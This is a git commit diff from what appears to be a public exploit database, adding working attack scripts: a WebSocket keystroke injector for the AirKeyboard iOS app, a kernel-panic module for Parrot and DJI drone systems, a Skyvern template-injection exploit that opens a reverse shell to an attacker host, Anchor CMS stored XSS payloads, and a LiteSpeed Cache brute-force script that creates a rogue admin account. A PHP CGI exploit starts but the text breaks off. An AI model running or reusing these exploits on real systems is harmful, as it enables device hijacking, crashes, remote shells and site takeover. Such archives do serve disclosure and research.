DB: 2025-06-16
15 changes to exploits/shellcodes/ghdb AirKeyboard iOS App 1.0.5 - Remote Input Injection Parrot and DJI variants Drone OSes - Kernel Panic Exploit Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation PHP CGI Module 8.3.4 - Remote Code Execution (RCE) Microsoft Excel Use After Free - Local Code Execution PCMan FTP Server 2.0.7 - Buffer Overflow PCMan FTP Server 2.0.7 - Remote Buffer Overflow WebDAV Windows 10 - Remote Code Execution (RCE) Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
This commit is contained in:
parent
b83d852b2f
commit
3cfac1e6a4
13 changed files with 1187 additions and 170 deletions
61
exploits/ios/remote/52333.py
Executable file
61
exploits/ios/remote/52333.py
Executable file
|
@ -0,0 +1,61 @@
|
||||||
|
# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
|
||||||
|
# Date: 2025-06-13
|
||||||
|
# Exploit Author: Chokri Hammedi
|
||||||
|
# Vendor Homepage: https://airkeyboardapp.com
|
||||||
|
# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
|
||||||
|
# Version: Version 1.0.5
|
||||||
|
# Tested on: iOS 18.5 with AirKeyboard app
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Description:
|
||||||
|
The AirKeyboard iOS application exposes a WebSocket server on port 8888
|
||||||
|
which accepts arbitrary input injection messages from any client.
|
||||||
|
No authentication or pairing process is required. This allows any
|
||||||
|
attacker to type arbitrary keystrokes directly into the victim’s iOS device
|
||||||
|
in real-time without user interaction, resulting in full remote input
|
||||||
|
control.
|
||||||
|
'''
|
||||||
|
|
||||||
|
import websocket
|
||||||
|
import json
|
||||||
|
import time
|
||||||
|
|
||||||
|
target_ip = "192.168.8.101"
|
||||||
|
ws_url = f"ws://{target_ip}:8888"
|
||||||
|
text = "i'm hacker i can write on your keyboard :)"
|
||||||
|
|
||||||
|
keystroke_payload = {
|
||||||
|
"type": 1,
|
||||||
|
"text": f"{text}",
|
||||||
|
"mode": 0,
|
||||||
|
"shiftKey": True,
|
||||||
|
"selectionStart": 1,
|
||||||
|
"selectionEnd": 1
|
||||||
|
}
|
||||||
|
|
||||||
|
def send_payload(ws):
|
||||||
|
print("[+] Sending remote keystroke...")
|
||||||
|
ws.send(json.dumps(keystroke_payload))
|
||||||
|
time.sleep(1)
|
||||||
|
ws.close()
|
||||||
|
|
||||||
|
def on_open(ws):
|
||||||
|
send_payload(ws)
|
||||||
|
|
||||||
|
def on_error(ws, error):
|
||||||
|
print(f"[!] Error: {error}")
|
||||||
|
|
||||||
|
def on_close(ws, close_status_code, close_msg):
|
||||||
|
print("[*] Connection closed")
|
||||||
|
|
||||||
|
def exploit():
|
||||||
|
print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
|
||||||
|
ws = websocket.WebSocketApp(ws_url,
|
||||||
|
on_open=on_open,
|
||||||
|
on_error=on_error,
|
||||||
|
on_close=on_close)
|
||||||
|
ws.run_forever()
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
exploit()
|
223
exploits/multiple/local/52329.py
Executable file
223
exploits/multiple/local/52329.py
Executable file
|
@ -0,0 +1,223 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit
|
||||||
|
# Author: Mohammed Idrees Banyamer
|
||||||
|
# Instagram: @banyamer_security
|
||||||
|
# GitHub: https://github.com/mbanyamer
|
||||||
|
# Date: 2025-06-10
|
||||||
|
# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M
|
||||||
|
# CVE: CVE-2025-37928
|
||||||
|
# Type: Local Privilege Escalation / Kernel Panic
|
||||||
|
# Platform: Linux-based drone OS (Parrot and DJI variants)
|
||||||
|
# Author Country: Jordan
|
||||||
|
# CVSS v3.1 Score: 7.3 (Important)
|
||||||
|
# Weakness: CWE-284: Improper Access Control
|
||||||
|
# Attack Vector: Local
|
||||||
|
# User Interaction: None
|
||||||
|
# Scope: Unchanged
|
||||||
|
# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)
|
||||||
|
# Exploit Code Maturity: Proof of Concept
|
||||||
|
# Remediation Level: Official Fix Available
|
||||||
|
#
|
||||||
|
# Description:
|
||||||
|
# This PoC triggers a kernel panic by calling schedule() inside an atomic context,
|
||||||
|
# exploiting CVE-2025-37928 present in certain Linux kernels running on
|
||||||
|
# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.
|
||||||
|
#
|
||||||
|
# Steps of exploitation:
|
||||||
|
# 1. Check if running as root.
|
||||||
|
# 2. Verify kernel version vulnerability.
|
||||||
|
# 3. Detect drone type from system files.
|
||||||
|
# 4. Build and load vulnerable kernel module.
|
||||||
|
# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.
|
||||||
|
#
|
||||||
|
# Affected Drone Versions:
|
||||||
|
# - Parrot QRD
|
||||||
|
# - Parrot Alpha-M (DT)
|
||||||
|
# - DJI QRD
|
||||||
|
# - DJI Alpha-M (DT)
|
||||||
|
#
|
||||||
|
# ------------------------------------------------------------------------------
|
||||||
|
# Usage:
|
||||||
|
# sudo python3 cve_2025_37928_tool.py [OPTIONS]
|
||||||
|
#
|
||||||
|
# Options:
|
||||||
|
# --dry-run Run detection & build only (no module loading)
|
||||||
|
# --force Force exploit even if kernel not detected as vulnerable
|
||||||
|
# --cleanup-only Remove the kernel module without triggering panic
|
||||||
|
# --verbose Enable detailed logging and debug output
|
||||||
|
# --help Show usage information
|
||||||
|
#
|
||||||
|
# Examples:
|
||||||
|
# sudo python3 cve_2025_37928_tool.py --dry-run
|
||||||
|
# sudo python3 cve_2025_37928_tool.py
|
||||||
|
# sudo python3 cve_2025_37928_tool.py --force
|
||||||
|
# sudo python3 cve_2025_37928_tool.py --cleanup-only
|
||||||
|
#
|
||||||
|
# Warning:
|
||||||
|
# This PoC causes an immediate kernel panic.
|
||||||
|
# Use it ONLY in isolated and controlled environments (e.g., lab tests).
|
||||||
|
# ------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import subprocess
|
||||||
|
import tempfile
|
||||||
|
import argparse
|
||||||
|
import shutil
|
||||||
|
import platform
|
||||||
|
|
||||||
|
MODULE_NAME = "cve_2025_37928_poc"
|
||||||
|
C_FILENAME = MODULE_NAME + ".c"
|
||||||
|
KO_FILENAME = MODULE_NAME + ".ko"
|
||||||
|
|
||||||
|
KERNEL_MODULE_CODE = r'''
|
||||||
|
#include <linux/module.h>
|
||||||
|
#include <linux/kernel.h>
|
||||||
|
#include <linux/init.h>
|
||||||
|
#include <linux/interrupt.h>
|
||||||
|
#include <linux/sched.h>
|
||||||
|
|
||||||
|
MODULE_LICENSE("GPL");
|
||||||
|
MODULE_AUTHOR("PoC Author");
|
||||||
|
MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic");
|
||||||
|
|
||||||
|
static void trigger_panic_tasklet(unsigned long data)
|
||||||
|
{
|
||||||
|
pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n");
|
||||||
|
schedule(); // This causes kernel panic
|
||||||
|
}
|
||||||
|
|
||||||
|
DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);
|
||||||
|
|
||||||
|
static int __init poc_init(void)
|
||||||
|
{
|
||||||
|
pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n");
|
||||||
|
tasklet_schedule(&my_tasklet);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void __exit poc_exit(void)
|
||||||
|
{
|
||||||
|
tasklet_kill(&my_tasklet);
|
||||||
|
pr_info("[CVE-2025-37928] PoC module unloaded\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
module_init(poc_init);
|
||||||
|
module_exit(poc_exit);
|
||||||
|
'''
|
||||||
|
|
||||||
|
MAKEFILE_CONTENT = f'''
|
||||||
|
obj-m += {MODULE_NAME}.o
|
||||||
|
|
||||||
|
all:
|
||||||
|
\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
|
||||||
|
|
||||||
|
clean:
|
||||||
|
\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
|
||||||
|
'''
|
||||||
|
|
||||||
|
def check_root():
|
||||||
|
if os.geteuid() != 0:
|
||||||
|
print("[-] Must be run as root.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def detect_kernel():
|
||||||
|
version = platform.release()
|
||||||
|
vulnerable_versions = ["5.10", "5.15", "6.0"]
|
||||||
|
vulnerable = any(v in version for v in vulnerable_versions)
|
||||||
|
print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}")
|
||||||
|
return vulnerable
|
||||||
|
|
||||||
|
def detect_drone_type():
|
||||||
|
print("[*] Detecting drone type...")
|
||||||
|
files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"]
|
||||||
|
found = []
|
||||||
|
for path in files:
|
||||||
|
if os.path.exists(path):
|
||||||
|
try:
|
||||||
|
with open(path, "r") as f:
|
||||||
|
content = f.read().strip()
|
||||||
|
if any(x in content for x in ["Parrot", "DJI"]):
|
||||||
|
found.append(content)
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
if found:
|
||||||
|
for d in found:
|
||||||
|
print(f" [i] Found: {d}")
|
||||||
|
else:
|
||||||
|
print(" [!] No drone ID found.")
|
||||||
|
return found
|
||||||
|
|
||||||
|
def write_module(tempdir):
|
||||||
|
c_path = os.path.join(tempdir, C_FILENAME)
|
||||||
|
makefile_path = os.path.join(tempdir, "Makefile")
|
||||||
|
with open(c_path, "w") as f:
|
||||||
|
f.write(KERNEL_MODULE_CODE)
|
||||||
|
with open(makefile_path, "w") as f:
|
||||||
|
f.write(MAKEFILE_CONTENT)
|
||||||
|
return c_path
|
||||||
|
|
||||||
|
def build_module(tempdir):
|
||||||
|
print("[*] Building module...")
|
||||||
|
result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True)
|
||||||
|
if result.returncode != 0:
|
||||||
|
print("[-] Build failed:\n", result.stderr)
|
||||||
|
sys.exit(1)
|
||||||
|
print("[+] Build successful.")
|
||||||
|
return os.path.join(tempdir, KO_FILENAME)
|
||||||
|
|
||||||
|
def load_module(ko_path):
|
||||||
|
print("[*] Loading kernel module...")
|
||||||
|
result = subprocess.run(["insmod", ko_path], capture_output=True, text=True)
|
||||||
|
if result.returncode != 0:
|
||||||
|
print("[-] insmod failed:\n", result.stderr)
|
||||||
|
sys.exit(1)
|
||||||
|
print("[!] Module loaded. Kernel panic should occur if vulnerable.")
|
||||||
|
|
||||||
|
def unload_module():
|
||||||
|
print("[*] Attempting to remove module...")
|
||||||
|
subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL)
|
||||||
|
print("[+] Module removal attempted.")
|
||||||
|
|
||||||
|
def clean_build(tempdir):
|
||||||
|
subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
|
||||||
|
|
||||||
|
def main():
|
||||||
|
parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes")
|
||||||
|
parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation")
|
||||||
|
parser.add_argument("--force", action="store_true", help="Force execution even if version unknown")
|
||||||
|
parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
check_root()
|
||||||
|
|
||||||
|
if args.cleanup_only:
|
||||||
|
unload_module()
|
||||||
|
return
|
||||||
|
|
||||||
|
vulnerable = detect_kernel()
|
||||||
|
detect_drone_type()
|
||||||
|
|
||||||
|
if not vulnerable and not args.force:
|
||||||
|
print("[-] Kernel not identified as vulnerable. Use --force to override.")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
if args.dry_run:
|
||||||
|
print("[*] Dry run mode. Exiting before exploitation.")
|
||||||
|
return
|
||||||
|
|
||||||
|
with tempfile.TemporaryDirectory() as tempdir:
|
||||||
|
print(f"[*] Working directory: {tempdir}")
|
||||||
|
write_module(tempdir)
|
||||||
|
ko_path = build_module(tempdir)
|
||||||
|
|
||||||
|
try:
|
||||||
|
load_module(ko_path)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("[!] Interrupted. Attempting cleanup...")
|
||||||
|
finally:
|
||||||
|
unload_module()
|
||||||
|
clean_build(tempdir)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
119
exploits/multiple/webapps/52335.py
Executable file
119
exploits/multiple/webapps/52335.py
Executable file
|
@ -0,0 +1,119 @@
|
||||||
|
# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
|
||||||
|
# Date: 2025-06-15
|
||||||
|
# Exploit Author: Cristian Branet
|
||||||
|
# Vendor Homepage: https://www.skyvern.com/
|
||||||
|
# Software Link: https://github.com/Skyvern-AI/skyvern
|
||||||
|
# Version: < 0.1.85, before commit db856cd
|
||||||
|
# Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04)
|
||||||
|
# CVE : CVE-2025-49619
|
||||||
|
# Article: https://cristibtz.github.io/posts/CVE-2025-49619/
|
||||||
|
|
||||||
|
'''
|
||||||
|
Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.
|
||||||
|
An attacker with low privileges can inject a malicious payload in a block that contains Prompt section,
|
||||||
|
which gets rendered server-side, resulting in blind remote code execution via curl.
|
||||||
|
'''
|
||||||
|
|
||||||
|
import requests, argparse, pyfiglet
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
|
||||||
|
parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)")
|
||||||
|
parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key")
|
||||||
|
parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
|
||||||
|
parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")
|
||||||
|
|
||||||
|
def create_exploit_workflow(url, ip, port, x_api_key):
|
||||||
|
exploit_workflow = {
|
||||||
|
"title": "Exploit",
|
||||||
|
"description": "",
|
||||||
|
"proxy_location": "RESIDENTIAL",
|
||||||
|
"webhook_callback_url": "",
|
||||||
|
"persist_browser_session": False,
|
||||||
|
"model": None,
|
||||||
|
"totp_verification_url": None,
|
||||||
|
"workflow_definition": {
|
||||||
|
"parameters": [],
|
||||||
|
"blocks": [
|
||||||
|
{
|
||||||
|
"label": "block_1",
|
||||||
|
"continue_on_failure": False,
|
||||||
|
"block_type": "task_v2",
|
||||||
|
"prompt": (
|
||||||
|
"{% for x in ().__class__.__base__.__subclasses__() %}\n"
|
||||||
|
" {% if 'warning' in x.__name__ %}\n"
|
||||||
|
" {{ x()._module.__builtins__['__import__']('os').popen(\n"
|
||||||
|
" \"python3 -c 'import socket,os,pty;\"\n"
|
||||||
|
" \"s=socket.socket();\"\n"
|
||||||
|
f" \'s.connect((\\\"{ip}\\\",{port}));\'\n"
|
||||||
|
" \"os.dup2(s.fileno(),0);\"\n"
|
||||||
|
" \"os.dup2(s.fileno(),1);\"\n"
|
||||||
|
" \"os.dup2(s.fileno(),2);\"\n"
|
||||||
|
" \"pty.spawn(\\\"sh\\\")'\"\n"
|
||||||
|
" ).read() }}\n"
|
||||||
|
" {% endif %}\n"
|
||||||
|
"{% endfor %}"
|
||||||
|
),
|
||||||
|
"url": "",
|
||||||
|
"max_steps": 25,
|
||||||
|
"totp_identifier": None,
|
||||||
|
"totp_verification_url": None
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"is_saved_task": False
|
||||||
|
}
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
"Content-Type": "application/json",
|
||||||
|
"X-API-Key": x_api_key
|
||||||
|
}
|
||||||
|
response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
print("[+] Exploit workflow created successfully!")
|
||||||
|
else:
|
||||||
|
print("[-] Failed to create exploit workflow:", response.text)
|
||||||
|
return None
|
||||||
|
|
||||||
|
workflow_permanent_id = response.json().get("workflow_permanent_id")
|
||||||
|
|
||||||
|
print(f"[+] Workflow Permanent ID: {workflow_permanent_id}")
|
||||||
|
|
||||||
|
return workflow_permanent_id
|
||||||
|
|
||||||
|
def run_exploit_workflow(url, x_api_key, workflow_permanent_id):
|
||||||
|
|
||||||
|
workflow_data = {
|
||||||
|
"workflow_id": workflow_permanent_id
|
||||||
|
}
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
"Content-Type": "application/json",
|
||||||
|
"X-API-Key": x_api_key
|
||||||
|
}
|
||||||
|
response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)
|
||||||
|
|
||||||
|
if response.status_code == 200:
|
||||||
|
print("[+] Exploit workflow executed successfully!")
|
||||||
|
else:
|
||||||
|
print("[-] Failed to execute exploit workflow:", response.text)
|
||||||
|
|
||||||
|
|
||||||
|
if __name__=="__main__":
|
||||||
|
|
||||||
|
print("\n")
|
||||||
|
print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
|
||||||
|
print("Author: Cristian Branet")
|
||||||
|
print("GitHub: github.com/cristibtz")
|
||||||
|
print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.")
|
||||||
|
print("\n")
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
url = args.url
|
||||||
|
x_api_key = args.x_api_key
|
||||||
|
ip = args.ip
|
||||||
|
port = args.port
|
||||||
|
|
||||||
|
workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key)
|
||||||
|
|
||||||
|
run_exploit_workflow(url, x_api_key, workflow_permanent_id)
|
|
@ -1,39 +0,0 @@
|
||||||
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
|
|
||||||
# Date: 04/28/2024
|
|
||||||
# Exploit Author: Ahmet Ümit BAYRAM
|
|
||||||
# Vendor Homepage: https://anchorcms.com/
|
|
||||||
# Software Link:
|
|
||||||
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
|
|
||||||
# Version: latest
|
|
||||||
# Tested on: MacOS
|
|
||||||
|
|
||||||
# Log in to Anchor CMS.
|
|
||||||
# Click on "Create New Post".
|
|
||||||
# Fill in the "Title" and enter the following payload in the field
|
|
||||||
immediately below:
|
|
||||||
# "><script>alert()</script>
|
|
||||||
# Go to the homepage, and you will see the alert!
|
|
||||||
|
|
||||||
|
|
||||||
### PoC Request ###
|
|
||||||
|
|
||||||
POST /anchor/admin/posts/edit/2 HTTP/1.1
|
|
||||||
Host: 127.0.0.1
|
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
|
|
||||||
Gecko/20100101 Firefox/124.0
|
|
||||||
Accept: */*
|
|
||||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
||||||
Accept-Encoding: gzip, deflate, br
|
|
||||||
X-Requested-With: XMLHttpRequest
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
Content-Length: 278
|
|
||||||
Origin: http://127.0.0.1
|
|
||||||
Connection: close
|
|
||||||
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
|
|
||||||
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
|
|
||||||
anchorcms=hlko7b1dbdpjgn58himf2obht5
|
|
||||||
Sec-Fetch-Dest: empty
|
|
||||||
Sec-Fetch-Mode: cors
|
|
||||||
Sec-Fetch-Site: same-origin
|
|
||||||
|
|
||||||
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
|
|
27
exploits/php/webapps/52327.txt
Normal file
27
exploits/php/webapps/52327.txt
Normal file
|
@ -0,0 +1,27 @@
|
||||||
|
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
|
||||||
|
# Google Dork: inurl:"/admin/pages/add" "Anchor CMS"
|
||||||
|
# Date: 2025-06-08
|
||||||
|
# Exploit Author: /bin/neko
|
||||||
|
# Vendor Homepage: http://anchorcms.com
|
||||||
|
# Software Link: https://github.com/anchorcms/anchor-cms
|
||||||
|
# Version: 0.12.7
|
||||||
|
# Tested on: Ubuntu 22.04 + Apache2 + PHP 8.1
|
||||||
|
# CVE: CVE-2025-46041
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
Anchor CMS v0.12.7 suffers from a stored Cross-Site Scripting (XSS) vulnerability
|
||||||
|
in the `markdown` field of the /admin/pages/add page.
|
||||||
|
An authenticated user with page creation privileges can inject arbitrary JavaScript,
|
||||||
|
which is stored and executed when the page is viewed.
|
||||||
|
|
||||||
|
# Steps to Reproduce:
|
||||||
|
1. Login to /admin
|
||||||
|
2. Navigate to Pages > Add Page
|
||||||
|
3. In the `Markdown` field, insert:
|
||||||
|
<script>alert(document.domain)</script>
|
||||||
|
4. Save the page.
|
||||||
|
5. View the created page. The script executes.
|
||||||
|
|
||||||
|
# Impact:
|
||||||
|
- Arbitrary JavaScript execution
|
||||||
|
- Potential session hijacking or admin impersonation
|
129
exploits/php/webapps/52328.py
Executable file
129
exploits/php/webapps/52328.py
Executable file
|
@ -0,0 +1,129 @@
|
||||||
|
# Exploit Title: Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation
|
||||||
|
# Date: 2025-06-10
|
||||||
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
||||||
|
# Contact: miladgrayhat@gmail.com
|
||||||
|
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
||||||
|
# Country: United Kingdom
|
||||||
|
# CVE : CVE-2024-28000
|
||||||
|
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import random
|
||||||
|
import string
|
||||||
|
import concurrent.futures
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
target_url = 'http://example.com'
|
||||||
|
rest_api_endpoint = '/wp-json/wp/v2/users'
|
||||||
|
ajax_endpoint = '/wp-admin/admin-ajax.php'
|
||||||
|
admin_user_id = '1'
|
||||||
|
num_hash_attempts = 1000000
|
||||||
|
num_workers = 10
|
||||||
|
new_username = 'newadminuser' # Replace with desired username
|
||||||
|
new_user_password = 'NewAdminPassword123!' # Replace with a secure password
|
||||||
|
|
||||||
|
def mt_srand(seed=None):
|
||||||
|
"""
|
||||||
|
Mimics PHP's mt_srand function by setting the seed for random number
|
||||||
|
generation.
|
||||||
|
"""
|
||||||
|
random.seed(seed)
|
||||||
|
|
||||||
|
def mt_rand(min_value=0, max_value=2**32 - 1):
|
||||||
|
"""
|
||||||
|
Mimics PHP's mt_rand function by generating a random number within the
|
||||||
|
specified range.
|
||||||
|
"""
|
||||||
|
return random.randint(min_value, max_value)
|
||||||
|
|
||||||
|
def generate_random_string(length=6):
|
||||||
|
"""
|
||||||
|
Generates a random string based on the output of mt_rand.
|
||||||
|
"""
|
||||||
|
chars = string.ascii_letters + string.digits
|
||||||
|
return ''.join(random.choices(chars, k=length))
|
||||||
|
|
||||||
|
def trigger_hash_generation():
|
||||||
|
payload = {
|
||||||
|
'action': 'async_litespeed',
|
||||||
|
'litespeed_type': 'crawler'
|
||||||
|
}
|
||||||
|
try:
|
||||||
|
response = requests.post(f'{target_url}{ajax_endpoint}',
|
||||||
|
data=payload)
|
||||||
|
if response.status_code == 200:
|
||||||
|
print('[INFO] Triggered hash generation.')
|
||||||
|
else:
|
||||||
|
print(f'[ERROR] Failed to trigger hash generation - Status
|
||||||
|
code: {response.status_code}')
|
||||||
|
except requests.RequestException as e:
|
||||||
|
print(f'[ERROR] AJAX request failed: {e}')
|
||||||
|
|
||||||
|
def attempt_hash(hash_value):
|
||||||
|
cookies = {
|
||||||
|
'litespeed_hash': hash_value,
|
||||||
|
'litespeed_role': admin_user_id
|
||||||
|
}
|
||||||
|
try:
|
||||||
|
response = requests.post(f'{target_url}{rest_api_endpoint}',
|
||||||
|
cookies=cookies)
|
||||||
|
return response, cookies
|
||||||
|
except requests.RequestException as e:
|
||||||
|
print(f'[ERROR] Request failed: {e}')
|
||||||
|
return None, None
|
||||||
|
|
||||||
|
def create_admin_user(cookies):
|
||||||
|
user_data = {
|
||||||
|
'username': new_username,
|
||||||
|
'password': new_user_password,
|
||||||
|
'email': f'{new_username}@example.com',
|
||||||
|
'roles': ['administrator']
|
||||||
|
}
|
||||||
|
try:
|
||||||
|
response = requests.post(f'{target_url}{rest_api_endpoint}',
|
||||||
|
cookies=cookies, json=user_data)
|
||||||
|
if response.status_code == 201:
|
||||||
|
print(f'[SUCCESS] New admin user "{new_username}" created
|
||||||
|
successfully!')
|
||||||
|
else:
|
||||||
|
print(f'[ERROR] Failed to create admin user - Status code:
|
||||||
|
{response.status_code} - Response: {response.text}')
|
||||||
|
except requests.RequestException as e:
|
||||||
|
print(f'[ERROR] User creation request failed: {e}')
|
||||||
|
|
||||||
|
def worker():
|
||||||
|
for _ in range(num_hash_attempts // num_workers):
|
||||||
|
random_string = generate_random_string()
|
||||||
|
print(f'[DEBUG] Trying hash: {random_string}')
|
||||||
|
|
||||||
|
response, cookies = attempt_hash(random_string)
|
||||||
|
|
||||||
|
if response is None:
|
||||||
|
continue
|
||||||
|
|
||||||
|
print(f'[DEBUG] Response status code: {response.status_code}')
|
||||||
|
print(f'[DEBUG] Response content: {response.text}')
|
||||||
|
|
||||||
|
if response.status_code == 201:
|
||||||
|
print(f'[SUCCESS] Valid hash found: {random_string}')
|
||||||
|
create_admin_user(cookies)
|
||||||
|
return
|
||||||
|
elif response.status_code == 401:
|
||||||
|
print(f'[FAIL] Invalid hash: {random_string}')
|
||||||
|
else:
|
||||||
|
print(f'[ERROR] Unexpected response for hash: {random_string} -
|
||||||
|
Status code: {response.status_code}')
|
||||||
|
|
||||||
|
def main():
|
||||||
|
# Seeding the random number generator (mimicking mt_srand)
|
||||||
|
mt_srand()
|
||||||
|
|
||||||
|
trigger_hash_generation()
|
||||||
|
|
||||||
|
with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as
|
||||||
|
executor:
|
||||||
|
futures = [executor.submit(worker) for _ in range(num_workers)]
|
||||||
|
concurrent.futures.wait(futures)
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
296
exploits/php/webapps/52331.py
Executable file
296
exploits/php/webapps/52331.py
Executable file
|
@ -0,0 +1,296 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
|
||||||
|
# Exploit Title: PHP CGI Module 8.3.4 - Remote Code Execution (RCE)
|
||||||
|
# Date: 2025-06-13
|
||||||
|
# Exploit Author: @ibrahimsql
|
||||||
|
# Exploit Author's github: https://github.com/yigitsql ( old account banned )
|
||||||
|
# Vendor Homepage: https://www.php.net/
|
||||||
|
# Software Link: https://www.php.net/downloads
|
||||||
|
# Version: PHP < 8.3.4, PHP < 8.2.17, PHP < 8.1.27
|
||||||
|
# Tested on: Kali Linux 2024.1
|
||||||
|
# CVE: CVE-2024-4577
|
||||||
|
# Description:
|
||||||
|
# A critical vulnerability in PHP's CGI implementation allows remote attackers to execute
|
||||||
|
# arbitrary code through command injection. The vulnerability exists due to improper handling
|
||||||
|
# of command-line arguments in PHP CGI, which can be exploited to bypass security restrictions
|
||||||
|
# and execute arbitrary commands with the privileges of the web server. This vulnerability
|
||||||
|
# affects all PHP versions before 8.3.4, 8.2.17, and 8.1.27.
|
||||||
|
#
|
||||||
|
# Impact:
|
||||||
|
# - Remote Code Execution (RCE)
|
||||||
|
# - Information Disclosure
|
||||||
|
# - Server Compromise
|
||||||
|
#
|
||||||
|
# References:
|
||||||
|
# - https://nvd.nist.gov/vuln/detail/cve-2024-4577
|
||||||
|
# - https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure
|
||||||
|
# - https://www.tarlogic.com/blog/cve-2024-4577-critical-vulnerability-php/
|
||||||
|
# - https://learn.microsoft.com/en-us/answers/questions/1725847/php-8-3-vulnerability-cve-2024-4577
|
||||||
|
# - https://www.stormshield.com/news/security-alert-php-cve-2024-4577-stormshields-product-response/
|
||||||
|
#
|
||||||
|
# Requirements: urllib3>=1.26.0, rich, requests>=2.25.0, alive_progress, concurrent.futures
|
||||||
|
|
||||||
|
import re
|
||||||
|
import sys
|
||||||
|
import base64
|
||||||
|
import requests
|
||||||
|
import argparse
|
||||||
|
from rich.console import Console
|
||||||
|
from urllib3 import disable_warnings
|
||||||
|
from urllib3.exceptions import InsecureRequestWarning
|
||||||
|
from alive_progress import alive_bar
|
||||||
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||||
|
|
||||||
|
disable_warnings(InsecureRequestWarning)
|
||||||
|
|
||||||
|
console = Console()
|
||||||
|
|
||||||
|
class PHPCGIExploit:
|
||||||
|
